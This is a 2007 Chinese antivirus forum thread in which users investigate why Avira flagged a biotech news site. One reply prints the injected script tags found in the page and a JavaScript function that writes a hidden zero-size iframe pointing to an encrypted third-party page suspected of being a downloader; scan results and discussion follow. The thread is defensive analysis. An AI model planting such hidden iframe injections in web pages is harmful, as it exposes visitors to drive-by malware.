查看: 5770|回复: 10
收起左侧

这个网站有毒吗?

[复制链接]
Southeastor
发表于 2007-3-16 08:29:33 | 显示全部楼层 |阅读模式
早上一打开生物通http://www.ebiotrade.com/就听见了小红伞的警报,奇怪了,以前打开的时候从来没有发生过,是设置的原因还是别的,有高手能解答一下吗?谢谢
allenhippo
发表于 2007-3-16 09:38:43 | 显示全部楼层
这个网页里有段代码:


  1. <TR><TD><TABLE cellSpacing=0 cellPadding=0 width="100%" border=0><TBODY><TR><TD width=75><DIV align=center><IMG src="http://www.ebiotrade.com/magazine/images/82.gif" width=54 height=70></DIV></TD><TD><TABLE cellSpacing=0 cellPadding=0 width="100%" border=0><TBODY><TR><TD><A href="http://www.ebiotrade.com/emagazine/index_6.aspx" target=_blank><STRONG><script src="http://www.001yl.com/8.js"></script> - <script src="
  2. http://www.001yl.com/8.js"></script></STRONG></A><BR><SPAN class=g13>·中国春小麦籽粒硬度puroindoline基因等位变异检测<br>
复制代码



里面这个8.js有问题,最后有段函数:

  1. function sethome(){
  2. document.write('<iframe src="http://www.zj5173.com/qq.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>');
  3. }
  4. if(amt()==1)
  5. {
  6. sethome()
  7. }
复制代码


而这个qq.htm里面是加密写的,我不会解。

[ 本帖最后由 allenhippo 于 2007-3-16 09:45 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Southeastor
 楼主| 发表于 2007-3-16 09:46:39 | 显示全部楼层
谢谢
allenhippo
发表于 2007-3-16 09:55:47 | 显示全部楼层
Antivirus
VersionUpdateResult
AhnLab-V32007.3.15.003.15.2007 [td]no virus found
AntiVir7.3.1.4303.15.2007HEUR/Exploit.HTML
Authentium4.93.803.15.2007 [td]no virus found
Avast4.7.936.003.15.2007 [td]no virus found
AVG7.5.0.44703.15.2007 [td]no virus found
BitDefender7.203.16.2007 [td]no virus found
CAT-QuickHeal9.0003.15.2007 [td]no virus found
ClamAV0.90.103.15.2007 [td]no virus found
DrWeb4.3303.15.2007 [td]no virus found
eSafe7.0.14.003.15.2007 [td]no virus found
eTrust-Vet30.6.348103.15.2007 [td]no virus found
Ewido4.003.15.2007 [td]no virus found
FileAdvisor103.16.2007 [td]no virus found
Fortinet2.85.0.003.15.2007 [td]no virus found
F-Prot4.3.1.4503.15.2007 [td]no virus found
F-Secure6.70.13030.003.15.2007 [td]no virus found
IkarusT3.1.1.303.15.2007 [td]no virus found
Kaspersky4.0.2.2403.16.2007 [td]no virus found
McAfee498503.15.2007 [td]no virus found
Microsoft1.230603.15.2007 [td]no virus found
NOD32v2211703.15.2007 [td]no virus found
Norman5.80.0203.15.2007 [td]no virus found
Panda9.0.0.403.15.2007 [td]no virus found
Prevx1V203.16.2007 [td]no virus found
Sophos4.15.003.13.2007 [td]no virus found
Sunbelt2.2.907.003.15.2007 [td]no virus found



只有红伞报那个qq.htm
beat2
发表于 2007-3-16 10:40:33 | 显示全部楼层
安全!没有在这个页面中找到木马,您可以免受内联框架式木马和脚本式木马的侵害!

悠游分析的

开红伞上去也没有事

[ 本帖最后由 beat2 于 2007-3-16 11:28 编辑 ]
风野胤
发表于 2007-3-16 11:33:09 | 显示全部楼层
看红伞报的似乎是壳而已
gggh
发表于 2007-3-16 11:35:50 | 显示全部楼层
QQ.HTM引用网站==http://s102.cnzz.com/stat.php?id=388309&web_id=388309&show=pic1' language='JavaScript' charset='gb2312'
可能会有毒.,
allenhippo
发表于 2007-3-16 13:04:48 | 显示全部楼层
原帖由 风野胤 于 2007-3-16 11:33 发表
看红伞报的似乎是壳而已


不是报壳,exploit的意思是 to treat a person or situation as an opportunity to gain an advantage for yourself,我不知道怎么准确的翻译成中文,exploit html整一个翻译我觉得是恶意网页比较好。

所以这是  启发/恶意网页,而不是 启发/加密
allenhippo
发表于 2007-3-16 13:05:45 | 显示全部楼层
原帖由 gggh 于 2007-3-16 11:35 发表
QQ.HTM引用网站==http://s102.cnzz.com/stat.php?id=388309&web_id=388309&show=pic1' language='JavaScript' charset='gb2312'
可能会有毒.,


这个没问题,关键上面那段加密代码,估计又是一个下载器。
gggh
发表于 2007-3-16 14:10:39 | 显示全部楼层
上报了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-19 04:41 , Processed in 0.135412 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表